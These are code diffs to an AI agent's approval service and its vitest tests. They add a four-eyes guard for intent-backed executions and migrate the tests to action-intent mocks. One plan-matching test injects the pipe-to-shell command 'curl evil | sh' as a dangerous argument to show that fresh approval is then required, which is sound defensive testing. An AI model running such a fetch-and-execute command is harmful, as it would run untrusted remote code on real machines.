+  return { ok: true, auth };
+}

--- a/apps/api/src/services/aiAgent.authz.test.ts
+++ b/apps/api/src/services/aiAgent.authz.test.ts
@@ -30,6 +30,7 @@ vi.mock('../db/schema', () => ({
     id: 'aiToolExecutions.id',
     status: 'aiToolExecutions.status',
     sessionId: 'aiToolExecutions.sessionId',
+    intentId: 'aiToolExecutions.intentId',
   },
   delegantM365Connections: {},
   devices: {},
@@ -47,7 +48,7 @@ vi.mock('./aiAgentSystemPrompt', () => ({ AI_SYSTEM_PROMPT_BASE: 'base' }));
 vi.mock('./brainDeviceContext', () => ({ getActiveDeviceContext: vi.fn() }));
 vi.mock('./aiInputSanitizer', () => ({ sanitizePageContext: (x: unknown) => x }));
 
-import { getSession, getSessionMessages, handleApproval } from './aiAgent';
+import { getSession, getSessionMessages, handleApproval, isIntentBackedExecution } from './aiAgent';
 
 type Cond = { op: string; col?: unknown; val?: unknown; conds?: Cond[] };
 
@@ -154,5 +155,64 @@ describe('handleApproval owner-binding (SR5-10)', () => {
     expect(setSpy).toHaveBeenCalledWith(
       expect.objectContaining({ status: 'approved', approvedBy: 'victim' }),
     );
+  });
+});
+
+// CRITICAL-3 (whole-branch review): the web chat "Approve" button was a
+// silent no-op for Tier-3 durable intents — handleApproval only ever flipped
+// ai_tool_executions, but the intent-backed chat flow blocks on
+// action_intents.status (waitForIntentDecision), so the row flip did nothing
+// and the route still reported `{ success: true }`. These tests pin down the
+// fix: an intent-backed execution is never flipped and never reported as a
+// successful self-approval, regardless of who's asking (unlike SR5-10, this
+// is NOT an owner check — it's a hard "this endpoint never decides intents").
+describe('handleApproval intent-backed guard (CRITICAL-3)', () => {
+  it('does not flip and returns false for an intent-backed execution, even for the session owner', async () => {
+    // Only the execution lookup should run — the intent-backed guard fires
+    // before getSession/owner-check, so a second select() must never happen.
+    stubSelectOnce([
+      { id: 'exec-1', status: 'pending', sessionId: 's1', intentId: 'intent-1' },
+    ]);
+    const setSpy = vi.fn().mockReturnValue({ where: vi.fn().mockResolvedValue(undefined) });
+    updateMock.mockReturnValue({ set: setSpy });
+
+    const ok = await handleApproval('exec-1', true, auth('victim'), 's1');
+
+    expect(ok).toBe(false);
+    expect(setSpy).not.toHaveBeenCalled();
+    expect(selectMock).toHaveBeenCalledTimes(1);
+  });
+
+  it('rejecting an intent-backed execution via this route is also refused (no reject-only bypass)', async () => {
+    stubSelectOnce([
+      { id: 'exec-1', status: 'pending', sessionId: 's1', intentId: 'intent-1' },
+    ]);
+    const setSpy = vi.fn().mockReturnValue({ where: vi.fn().mockResolvedValue(undefined) });
+    updateMock.mockReturnValue({ set: setSpy });
+
+    const ok = await handleApproval('exec-1', false, auth('victim'), 's1');
+
+    expect(ok).toBe(false);
+    expect(setSpy).not.toHaveBeenCalled();
+  });
+});
+
+describe('isIntentBackedExecution', () => {
+  it('returns true when the execution row carries an intent_id', async () => {
+    stubSelectOnce([{ intentId: 'intent-1' }]);
+
+    await expect(isIntentBackedExecution('exec-1')).resolves.toBe(true);
+  });
+
+  it('returns false for a legacy (non-intent) execution', async () => {
+    stubSelectOnce([{ intentId: null }]);
+
+    await expect(isIntentBackedExecution('exec-1')).resolves.toBe(false);
+  });
+
+  it('returns false when the execution does not exist', async () => {
+    stubSelectOnce([]);
+
+    await expect(isIntentBackedExecution('exec-missing')).resolves.toBe(false);
   });
 });

--- a/apps/api/src/services/aiAgent.ts
+++ b/apps/api/src/services/aiAgent.ts
@@ -373,6 +373,30 @@ export async function handleApproval(
     .limit(1);
 
   if (!execution || execution.status !== 'pending') return false;
+
+  if (execution.intentId) {
+    // Intent-backed (Tier-3 durable action-intents flow, spec §6.1): this
+    // execution's real approval state lives on action_intents.status, decided
+    // by services/actionIntents/intentService.ts's approver fan-out — NOT by
+    // this route. Flipping ai_tool_executions here would report success while
+    // nothing was actually decided (whole-branch review CRITICAL-3): the chat
+    // flow blocks on waitForIntentDecision reading action_intents.status, so
+    // a bare status flip is a silent no-op that times the session out.
+    //
+    // This also must NOT fall through to the SR5-10 owner-only check below —
+    // the intents model is a FOUR-EYES approval (the requester is usually NOT
+    // an eligible approver of their own intent), the opposite of the
+    // session-owner self-approval this function otherwise implements. Decide
+    // via the /approvals surface (mobile push or the Approvals queue)
+    // instead. Route callers use isIntentBackedExecution() to turn this
+    // `false` into an honest "pending" response instead of a bare 404.
+    console.warn(
+      '[AI] Self-approve attempt on intent-backed execution rejected (four-eyes model):',
+      JSON.stringify({ executionId, intentId: execution.intentId, actorId: auth.user.id }),
+    );
+    return false;
+  }
+
   if (expectedSessionId && execution.sessionId !== expectedSessionId) {
     // SECURITY: a caller approved an execution via a session route that does not
     // own it (cross-session approval-forgery attempt). We keep returning `false`
@@ -424,6 +448,25 @@ export async function handleApproval(
     .where(eq(aiToolExecutions.id, executionId));
 
   return true;
+}
+
+/**
+ * Whether a tool execution is bound to a durable action_intents row (Tier-3
+ * chat flow — services/actionIntents/intentService.ts's createActionIntent).
+ * Used by the sessions-approve routes to turn a `handleApproval` `false`
+ * into an honest "pending, decide via /approvals" response instead of a bare
+ * "not found" 404 when the false was actually due to the four-eyes guard
+ * above (whole-branch review CRITICAL-3), without changing handleApproval's
+ * boolean contract for the (unrelated, unchanged) non-intent paths.
+ */
+export async function isIntentBackedExecution(executionId: string): Promise<boolean> {
+  const [execution] = await db
+    .select({ intentId: aiToolExecutions.intentId })
+    .from(aiToolExecutions)
+    .where(eq(aiToolExecutions.id, executionId))
+    .limit(1);
+
+  return !!execution?.intentId;
 }
 
 // ============================================

--- a/apps/api/src/services/aiAgentSdk.planMatch.test.ts
+++ b/apps/api/src/services/aiAgentSdk.planMatch.test.ts
@@ -2,7 +2,6 @@ import { describe, it, expect, vi, beforeEach } from 'vitest';
 import { createSessionPreToolUse } from './aiAgentSdk';
 import { db } from '../db';
 import { checkGuardrails, checkToolPermission, checkToolRateLimit } from './aiGuardrails';
-import { waitForApproval } from './aiAgent';
 
 // ============================================
 // Mocks (mirror aiAgentSdk.test.ts)
@@ -94,6 +93,30 @@ vi.mock('./m365Helpers', () => ({
   loadConnection: vi.fn().mockResolvedValue(null),
 }));
 
+const mockCreateActionIntent = vi.fn();
+const mockWaitForIntentDecision = vi.fn();
+const mockTransitionIntent = vi.fn();
+vi.mock('./actionIntents/intentService', () => ({
+  createActionIntent: (...args: unknown[]) => mockCreateActionIntent(...args),
+  waitForIntentDecision: (...args: unknown[]) => mockWaitForIntentDecision(...args),
+  transitionIntent: (...args: unknown[]) => mockTransitionIntent(...args),
+}));
+
+function makeIntentSnapshot(overrides: Record<string, unknown> = {}) {
+  return {
+    id: 'intent-1',
+    status: 'pending_approval',
+    actionName: 'execute_command',
+    argumentDigest: 'digest-1',
+    source: 'chat',
+    expiresAt: new Date(Date.now() + 300_000),
+    result: null,
+    errorCode: null,
+    approvalRequestIds: ['appr-1'],
+    ...overrides,
+  };
+}
+
 // ============================================
 // Test helpers
 // ============================================
@@ -161,6 +184,12 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       requiresApproval: true,
       description: 'Execute command',
     } as any);
+    // Default fall-through decision: intent created, approved, session wins
+    // the release CAS (inline execution — mirrors today's UX for these
+    // deviation tests, which only assert that fresh approval was required).
+    mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot());
+    mockWaitForIntentDecision.mockResolvedValue('approved');
+    mockTransitionIntent.mockResolvedValue(true);
   });
 
   it('runs WITHOUT fresh approval when executing args exactly match the approved step', async () => {
@@ -183,7 +212,7 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       toolName: 'execute_command',
       status: 'executing',
     }));
-    expect(waitForApproval).not.toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).not.toHaveBeenCalled();
     expect(session.eventBus.publish).toHaveBeenCalledWith(expect.objectContaining({
       type: 'plan_step_start',
       stepIndex: 0,
@@ -197,7 +226,6 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       approvedPlanSteps: new Map([[0, { toolName: 'execute_command', input: approvedArgs }]]),
     });
     const { values } = mockInsertReturning({ id: 'exec-1' });
-    vi.mocked(waitForApproval).mockResolvedValue(true);
 
     const result = await createSessionPreToolUse(session)('execute_command', {
       deviceId: 'd-1',
@@ -210,7 +238,7 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       toolName: 'execute_command',
       status: 'pending',
     }));
-    expect(waitForApproval).toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).toHaveBeenCalled();
     expect(session.eventBus.publish).not.toHaveBeenCalledWith(
       expect.objectContaining({ type: 'plan_step_start' }),
     );
@@ -221,11 +249,10 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       approvedPlanSteps: new Map([[0, { toolName: 'execute_command', input: { deviceId: 'd-1', command: 'reboot' } }]]),
     });
     mockInsertReturning({ id: 'exec-2' });
-    vi.mocked(waitForApproval).mockResolvedValue(true);
 
     await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-999', command: 'reboot' });
 
-    expect(waitForApproval).toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).toHaveBeenCalled();
     expect(session.eventBus.publish).not.toHaveBeenCalledWith(
       expect.objectContaining({ type: 'plan_step_start' }),
     );
@@ -236,13 +263,12 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       approvedPlanSteps: new Map([[0, { toolName: 'execute_command', input: { deviceId: 'd-1' } }]]),
     });
     mockInsertReturning({ id: 'exec-3' });
-    vi.mocked(waitForApproval).mockResolvedValue(true);
 
     // deviceId matches, but a dangerous 'command' field was injected that the
     // approved step never contained. The old subset check would have let this run.
     await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1', command: 'curl evil | sh' });
 
-    expect(waitForApproval).toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).toHaveBeenCalled();
     expect(session.eventBus.publish).not.toHaveBeenCalledWith(
       expect.objectContaining({ type: 'plan_step_start' }),
     );
@@ -253,12 +279,11 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       approvedPlanSteps: new Map([[0, { toolName: 'execute_command', input: { deviceId: 'd-1', command: 'whoami' } }]]),
     });
     mockInsertReturning({ id: 'exec-4' });
-    vi.mocked(waitForApproval).mockResolvedValue(true);
 
     // Omitting 'command' previously skipped the comparison entirely.
     await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1' });
 
-    expect(waitForApproval).toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).toHaveBeenCalled();
     expect(session.eventBus.publish).not.toHaveBeenCalledWith(
       expect.objectContaining({ type: 'plan_step_start' }),
     );
@@ -280,7 +305,7 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
 
     expect(result).toEqual({ allowed: true });
     expect(values).toHaveBeenCalledWith(expect.objectContaining({ status: 'executing' }));
-    expect(waitForApproval).not.toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).not.toHaveBeenCalled();
   });
 
   it('requires fresh approval when a nested arg value changes', async () => {
@@ -291,11 +316,10 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
       }]]),
     });
     mockInsertReturning({ id: 'exec-5' });
-    vi.mocked(waitForApproval).mockResolvedValue(true);
 
     await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1', opts: { timeout: 9999 } });
 
-    expect(waitForApproval).toHaveBeenCalled();
+    expect(mockWaitForIntentDecision).toHaveBeenCalled();
     expect(session.eventBus.publish).not.toHaveBeenCalledWith(
       expect.objectContaining({ type: 'plan_step_start' }),
     );

--- a/apps/api/src/services/aiAgentSdk.planMatch.test.ts
+++ b/apps/api/src/services/aiAgentSdk.planMatch.test.ts
@@ -102,6 +102,13 @@ vi.mock('./actionIntents/intentService', () => ({
   transitionIntent: (...args: unknown[]) => mockTransitionIntent(...args),
 }));
 
+// Collaborator mock (also cuts the real module's ../aiTools import chain, which
+// would drag in aiToolSchemas' drizzle-enum schemas the ../db/schema mock does
+// not provide). Default: still authorized.
+vi.mock('./actionIntents/revalidateRelease', () => ({
+  revalidateApprovedIntentForRelease: vi.fn(async () => ({ ok: true, auth: {} })),
+}));
+
 function makeIntentSnapshot(overrides: Record<string, unknown> = {}) {
   return {
     id: 'intent-1',
@@ -190,6 +197,15 @@ describe('createSessionPreToolUse — approved plan step argument matching', () 
     mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot());
     mockWaitForIntentDecision.mockResolvedValue('approved');
     mockTransitionIntent.mockResolvedValue(true);
+    // Default chainable for the inline release-win system read (intent row +
+    // winning approval). revalidateApprovedIntentForRelease is mocked to ok, so
+    // the row only needs to be non-null.
+    const selectChain: Record<string, unknown> = {
+      from: vi.fn(() => selectChain),
+      where: vi.fn(() => selectChain),
+      limit: vi.fn(async () => [{ id: 'intent', boundArgumentDigest: 'digest' }]),
+    };
+    vi.mocked(db.select).mockReturnValue(selectChain as any);
   });
 
   it('runs WITHOUT fresh approval when executing args exactly match the approved step', async () => {

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -723,6 +723,115 @@ describe('createSessionPreToolUse', () => {
     });
   });
 
+  describe('Tier 2 per_step: legacy lightweight approval bridge (regression fix)', () => {
+    beforeEach(() => {
+      mockCreateActionIntent.mockReset();
+      mockWaitForIntentDecision.mockReset();
+      mockTransitionIntent.mockReset();
+    });
+
+    it('inserts a linked approval_requests row, waits via waitForApproval, and executes on approve — WITHOUT creating an action intent', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 2,
+        requiresApproval: false,
+        description: 'Take screenshot',
+      } as any);
+      const { values } = mockInsertReturning({ id: 'exec-2' });
+      mockGetUserPushTokens.mockResolvedValue([
+        { token: 'ExponentPushToken[abc]', platform: 'ios', provider: 'expo' },
+      ]);
+      mockDispatchApprovalPushToTokens.mockResolvedValue({ tokensFound: 1, dispatched: 1, errors: 0 });
+      vi.mocked(waitForApproval).mockResolvedValue(true);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
+
+      const result = await createSessionPreToolUse(session)('take_screenshot', { deviceId: 'd-1' });
+
+      expect(result).toEqual({ allowed: true });
+
+      // Both inserts fire: ai_tool_executions THEN approval_requests (old
+      // direct bridge — NOT createActionIntent).
+      expect(values).toHaveBeenCalledWith(expect.objectContaining({
+        sessionId: 'session-1',
+        toolName: 'take_screenshot',
+        status: 'pending',
+      }));
+      expect(values).toHaveBeenCalledWith(expect.objectContaining({
+        userId: 'user-1',
+        executionId: 'exec-2',
+        requestingClientLabel: 'Breeze AI',
+        actionToolName: 'take_screenshot',
+        riskTier: 'medium',
+        status: 'pending',
+      }));
+
+      // Push dispatched (best-effort), same as the pre-Task-8 behavior.
+      expect(mockGetUserPushTokens).toHaveBeenCalledWith('user-1');
+      expect(mockDispatchApprovalPushToTokens).toHaveBeenCalled();
+
+      expect(session.eventBus.publish).toHaveBeenCalledWith(expect.objectContaining({
+        type: 'approval_required',
+        executionId: 'exec-2',
+        toolName: 'take_screenshot',
+        description: 'Take screenshot',
+      }));
+
+      expect(waitForApproval).toHaveBeenCalledWith('exec-2', 300_000, expect.any(AbortSignal));
+      expect(mockSet).toHaveBeenCalledWith({ status: 'executing' });
+
+      // THE REGRESSION: Tier 2 under per_step must never route through the
+      // durable action-intents layer — createActionIntent throws
+      // ActionIntentTierError('tool_not_tier3') for anything below Tier 3.
+      expect(mockCreateActionIntent).not.toHaveBeenCalled();
+      expect(mockWaitForIntentDecision).not.toHaveBeenCalled();
+      expect(mockTransitionIntent).not.toHaveBeenCalled();
+    });
+
+    it('returns allowed:false without creating an action intent when rejected or timed out', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 2,
+        requiresApproval: false,
+        description: 'Take screenshot',
+      } as any);
+      mockInsertReturning({ id: 'exec-3' });
+      mockGetUserPushTokens.mockResolvedValue([]);
+      vi.mocked(waitForApproval).mockResolvedValue(false);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
+
+      const result = await createSessionPreToolUse(session)('take_screenshot', {});
+
+      expect(result).toEqual({ allowed: false, error: 'Tool execution was rejected or timed out' });
+      expect(mockCreateActionIntent).not.toHaveBeenCalled();
+    });
+
+    it('does not register the session in pendingIntentBySession, so the postToolUse completion-CAS stays a no-op', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 2,
+        requiresApproval: false,
+        description: 'Take screenshot',
+      } as any);
+      mockInsertReturning({ id: 'exec-4' });
+      mockGetUserPushTokens.mockResolvedValue([]);
+      vi.mocked(waitForApproval).mockResolvedValue(true);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
+      const session = makeActiveSession({ approvalMode: 'per_step' });
+
+      const preResult = await createSessionPreToolUse(session)('take_screenshot', {});
+      expect(preResult).toEqual({ allowed: true });
+
+      mockTransitionIntent.mockClear();
+      const postToolUse = createSessionPostToolUse(session);
+      await postToolUse('take_screenshot', {}, JSON.stringify({ status: 'completed' }), false, 5);
+
+      expect(mockTransitionIntent).not.toHaveBeenCalled();
+    });
+  });
+
   it('blocks tools outside the session allowlist before approval handling', async () => {
     const session = makeActiveSession({
       approvalMode: 'auto_approve',

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -108,6 +108,24 @@ vi.mock('./actionIntents/intentService', () => ({
   transitionIntent: (...args: unknown[]) => mockTransitionIntent(...args),
 }));
 
+// Mocked as a collaborator (like intentService): the inline release path calls
+// this to re-prove the requester's authorization before executing. Also cuts
+// the real module's ../aiTools import chain (which would otherwise drag in
+// aiToolSchemas' drizzle-enum schemas the ../db/schema mock doesn't provide).
+// Default: still authorized. Fail-path tests override the resolved value.
+const mockRevalidateApprovedIntentForRelease = vi.fn(async () => ({ ok: true, auth: {} }));
+vi.mock('./actionIntents/revalidateRelease', () => ({
+  revalidateApprovedIntentForRelease: (...args: unknown[]) =>
+    mockRevalidateApprovedIntentForRelease(...args),
+}));
+
+// Real actionIntents schema is imported by aiAgentSdk for the inline system
+// read; the ../db/schema mock above only stubs approvalRequests, so stub the
+// actionIntents table object the query builder references here too.
+vi.mock('../db/schema/actionIntents', () => ({
+  actionIntents: { id: 'id', status: 'status' },
+}));
+
 // ============================================
 // Test helpers
 // ============================================
@@ -521,6 +539,17 @@ describe('createSessionPreToolUse', () => {
       mockCreateActionIntent.mockReset();
       mockWaitForIntentDecision.mockReset();
       mockTransitionIntent.mockReset();
+      mockRevalidateApprovedIntentForRelease.mockReset();
+      mockRevalidateApprovedIntentForRelease.mockResolvedValue({ ok: true, auth: {} });
+      // Default chainable for the inline release-win system read (loads the
+      // intent row + winning approval before revalidation). Revalidation itself
+      // is mocked above, so the row contents only need to be non-null.
+      const selectChain: Record<string, unknown> = {
+        from: vi.fn(() => selectChain),
+        where: vi.fn(() => selectChain),
+        limit: vi.fn(async () => [{ id: 'intent', boundArgumentDigest: 'digest' }]),
+      };
+      vi.mocked(db.select).mockReturnValue(selectChain as any);
     });
 
     it('creates a chat-sourced action intent and blocks on waitForIntentDecision, even under auto-approve', async () => {
@@ -581,7 +610,7 @@ describe('createSessionPreToolUse', () => {
       const result = await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1' });
 
       expect(result).toEqual({ allowed: true });
-      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-2', 'approved', 'executing', { executedAt: null });
+      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-2', 'approved', 'executing', { executedAt: null }, { requireNotExpired: true });
       // ai_tool_executions ledger row marked executing (the inline path today's UX).
       expect(mockSet).toHaveBeenCalledWith({ status: 'executing' });
     });
@@ -607,7 +636,7 @@ describe('createSessionPreToolUse', () => {
         allowed: false,
         error: 'This action is already being completed by the approval worker; it will not run twice.',
       });
-      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-3', 'approved', 'executing', { executedAt: null });
+      expect(mockTransitionIntent).toHaveBeenCalledWith('intent-3', 'approved', 'executing', { executedAt: null }, { requireNotExpired: true });
       // The intent-id link stamp (unconditional, ahead of the release CAS)
       // still happens, but no inline execution: the "mark as executing"
       // update never fires.

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -694,9 +694,13 @@ describe('createSessionPreToolUse', () => {
       const postToolUse = createSessionPostToolUse(session);
       await postToolUse('execute_command', {}, JSON.stringify({ error: 'boom' }), true, 10);
 
+      // error_code is a stable, categorized short code (matches the durable
+      // release worker's vocabulary) — never the raw, unbounded tool error
+      // text. The raw message still lands in `result` for diagnosis.
       expect(mockTransitionIntent).toHaveBeenCalledWith('intent-7', 'executing', 'failed', expect.objectContaining({
         executedAt: expect.any(Date),
-        errorCode: 'boom',
+        errorCode: 'tool_execution_failed',
+        result: expect.objectContaining({ error: 'boom' }),
       }));
     });
 

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -533,6 +533,8 @@ describe('createSessionPreToolUse', () => {
       mockInsertReturning({ id: 'exec-1' });
       mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-1', approvalRequestIds: ['appr-1'] }));
       mockWaitForIntentDecision.mockResolvedValue('rejected');
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
       const session = makeActiveSession({ approvalMode: 'auto_approve' });
 
       const result = await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1' });
@@ -545,11 +547,15 @@ describe('createSessionPreToolUse', () => {
         reason: 'Execute command',
         orgId: 'org-1',
       }));
+      // The ledger row is stamped with the intent id so handleApproval can
+      // detect it's intent-backed (CRITICAL-3).
+      expect(mockSet).toHaveBeenCalledWith({ intentId: 'intent-1' });
       expect(session.eventBus.publish).toHaveBeenCalledWith(expect.objectContaining({
         type: 'approval_required',
         executionId: 'exec-1',
         approvalRequestId: 'appr-1',
         toolName: 'execute_command',
+        intentBacked: true,
       }));
       expect(mockWaitForIntentDecision).toHaveBeenCalledWith('intent-1', 300_000, expect.any(AbortSignal));
       // The old direct approval_requests bridge + push are gone — createActionIntent owns both now.
@@ -591,6 +597,8 @@ describe('createSessionPreToolUse', () => {
       mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-3', approvalRequestIds: ['appr-3'] }));
       mockWaitForIntentDecision.mockResolvedValue('approved');
       mockTransitionIntent.mockResolvedValue(false);
+      const mockSet = vi.fn(() => ({ where: vi.fn().mockResolvedValue(undefined) }));
+      vi.mocked(db.update).mockReturnValue({ set: mockSet } as any);
       const session = makeActiveSession({ approvalMode: 'per_step' });
 
       const result = await createSessionPreToolUse(session)('execute_command', {});
@@ -600,8 +608,11 @@ describe('createSessionPreToolUse', () => {
         error: 'This action is already being completed by the approval worker; it will not run twice.',
       });
       expect(mockTransitionIntent).toHaveBeenCalledWith('intent-3', 'approved', 'executing', { executedAt: null });
-      // No inline execution: the "mark as executing" update never fires.
-      expect(db.update).not.toHaveBeenCalled();
+      // The intent-id link stamp (unconditional, ahead of the release CAS)
+      // still happens, but no inline execution: the "mark as executing"
+      // update never fires.
+      expect(mockSet).toHaveBeenCalledWith({ intentId: 'intent-3' });
+      expect(mockSet).not.toHaveBeenCalledWith({ status: 'executing' });
     });
 
     it('returns allowed:false without touching the intent when rejected/cancelled/expired', async () => {
@@ -781,6 +792,12 @@ describe('createSessionPreToolUse', () => {
         toolName: 'take_screenshot',
         description: 'Take screenshot',
       }));
+      // Legacy Tier-2 per_step bridge is NOT intent-backed — the web chat
+      // card must still show a normal self-approve button for this one.
+      const publishedEvent = vi.mocked(session.eventBus.publish).mock.calls
+        .map(([evt]: [any]) => evt)
+        .find((evt: any) => evt.type === 'approval_required');
+      expect((publishedEvent as any)?.intentBacked).toBeUndefined();
 
       expect(waitForApproval).toHaveBeenCalledWith('exec-2', 300_000, expect.any(AbortSignal));
       expect(mockSet).toHaveBeenCalledWith({ status: 'executing' });

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -113,7 +113,9 @@ vi.mock('./actionIntents/intentService', () => ({
 // the real module's ../aiTools import chain (which would otherwise drag in
 // aiToolSchemas' drizzle-enum schemas the ../db/schema mock doesn't provide).
 // Default: still authorized. Fail-path tests override the resolved value.
-const mockRevalidateApprovedIntentForRelease = vi.fn(async () => ({ ok: true, auth: {} }));
+const mockRevalidateApprovedIntentForRelease = vi.fn((..._args: unknown[]) =>
+  Promise.resolve({ ok: true, auth: {} } as { ok: boolean; auth: unknown }),
+);
 vi.mock('./actionIntents/revalidateRelease', () => ({
   revalidateApprovedIntentForRelease: (...args: unknown[]) =>
     mockRevalidateApprovedIntentForRelease(...args),

--- a/apps/api/src/services/aiAgentSdk.test.ts
+++ b/apps/api/src/services/aiAgentSdk.test.ts
@@ -99,6 +99,15 @@ vi.mock('./pamToolActionGovernance', () => ({
   mirrorElevationDecisionToExecution: vi.fn(),
 }));
 
+const mockCreateActionIntent = vi.fn();
+const mockWaitForIntentDecision = vi.fn();
+const mockTransitionIntent = vi.fn();
+vi.mock('./actionIntents/intentService', () => ({
+  createActionIntent: (...args: unknown[]) => mockCreateActionIntent(...args),
+  waitForIntentDecision: (...args: unknown[]) => mockWaitForIntentDecision(...args),
+  transitionIntent: (...args: unknown[]) => mockTransitionIntent(...args),
+}));
+
 // ============================================
 // Test helpers
 // ============================================
@@ -169,6 +178,21 @@ function makeActiveSession(overrides: Record<string, unknown> = {}) {
     allowedTools: undefined,
     ...overrides,
   } as any;
+}
+
+function makeIntentSnapshot(overrides: Record<string, unknown> = {}) {
+  return {
+    id: 'intent-1',
+    status: 'pending_approval',
+    actionName: 'execute_command',
+    argumentDigest: 'digest-1',
+    source: 'chat',
+    expiresAt: new Date(Date.now() + 300_000),
+    result: null,
+    errorCode: null,
+    approvalRequestIds: ['appr-1'],
+    ...overrides,
+  };
 }
 
 // ============================================
@@ -492,101 +516,211 @@ describe('createSessionPreToolUse', () => {
     expect(waitForApproval).not.toHaveBeenCalled();
   });
 
-  it('keeps Tier 3 tools pending under auto-approve', async () => {
-    vi.mocked(checkGuardrails).mockReturnValue({
-      allowed: true,
-      tier: 3,
-      requiresApproval: true,
-      description: 'Execute command',
-    } as any);
-    const { values } = mockInsertReturning({ id: 'exec-1' });
-    mockGetUserPushTokens.mockResolvedValue([]);
-    vi.mocked(waitForApproval).mockResolvedValue(false);
-    const session = makeActiveSession({ approvalMode: 'auto_approve' });
+  describe('Tier 3: durable action-intents backing (spec §6.1)', () => {
+    beforeEach(() => {
+      mockCreateActionIntent.mockReset();
+      mockWaitForIntentDecision.mockReset();
+      mockTransitionIntent.mockReset();
+    });
 
-    const result = await createSessionPreToolUse(session)('execute_command', {});
+    it('creates a chat-sourced action intent and blocks on waitForIntentDecision, even under auto-approve', async () => {
+      vi.mocked(checkGuardrails).mockReturnValue({
+        allowed: true,
+        tier: 3,
+        requiresApproval: true,
+        description: 'Execute command',
+      } as any);
+      mockInsertReturning({ id: 'exec-1' });
+      mockCreateActionIntent.mockResolvedValue(makeIntentSnapshot({ id: 'intent-1', approvalRequestIds: ['appr-1'] }));
+      mockWaitForIntentDecision.mockResolvedValue('rejected');
+      const session = makeActiveSession({ approvalMode: 'auto_approve' });
 
-    expect(result).toEqual({ allowed: false, error: 'Tool execution was rejected or timed out' });
-    expect(values).toHaveBeenCalledWith(expect.objectContaining({
-      sessionId: 'session-1',
-      toolName: 'execute_command',
-      status: 'pending',
-    }));
-    expect(session.eventBus.publish).toHaveBeenCalledWith(expect.objectContaining({
-      type: 'approval_required',
-      executionId: 'exec-1',
-      toolName: 'execute_command',
-    }));
-    expect(waitForApproval).toHaveBeenCalledWith('exec-1', 300_000, expect.any(AbortSignal));
-  });
+      const result = await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1' });
 
-  it('inserts a linked approval_requests row and emits approvalRequestId on per-step approval', async () => {
-    vi.mocked(checkGuardrails).mockReturnValue({
-      allowed: true,
-      tier: 3,
-      requiresApproval: true,
-      description: 'Execute command on host-1',
-    } as any);
-    const { values } = mockInsertReturning({ id: 'exec-1' });
-    mockGetUserPushTokens.mockResolvedValue([
-      { token: 'ExponentPushToken[abc]', platform: 'ios', provider: 'expo' },
-    ]);
-    mockDispatchApprovalPushToTokens.mockResolvedValue({ tokensFound: 1, dispatched: 1, errors: 0 });
-    vi.mocked(waitForApproval).mockResolvedValue(true);
-    const session = makeActiveSession({ approvalMode: 'per_step' });
+      expect(result).toEqual({ allowed: false, error: 'Tool execution was rejected, cancelled, or expired' });
+      expect(mockCreateActionIntent).toHaveBeenCalledWith(session.auth, expect.objectContaining({
+        toolName: 'execute_command',
+        input: { deviceId: 'd-1' },
+        source: 'chat',
+        reason: 'Execute command',
+        orgId: 'org-1',
+      }));
+      expect(session.eventBus.publish).toHaveBeenCalledWith(expect.objectContaining({
+        type: 'approval_required',
+        executionId: 'exec-1',
+        approvalRequestId: 'appr-1',
+        toolName: 'execute_command',
+      }));
+      expect(mockWaitForIntentDecision).toHaveBeenCalledWith('intent-1', 300_000, expect.any(AbortSignal));
+      // The old direct approval_requests bridge + push are gone — createActionIntent owns both now.
+      expect(mockGetUserPushTokens).not.toHaveBeenCalled();
+      expect(mockDispatchApprovalPushToTokens).not.toHaveBeenCalled();
+    });
 
-    const result = await createSessionPreToolUse(session)('execute_command', { deviceId: 'd-1' });
+    it('executes inline when the session wins the approved -> executing release CAS', async () => {
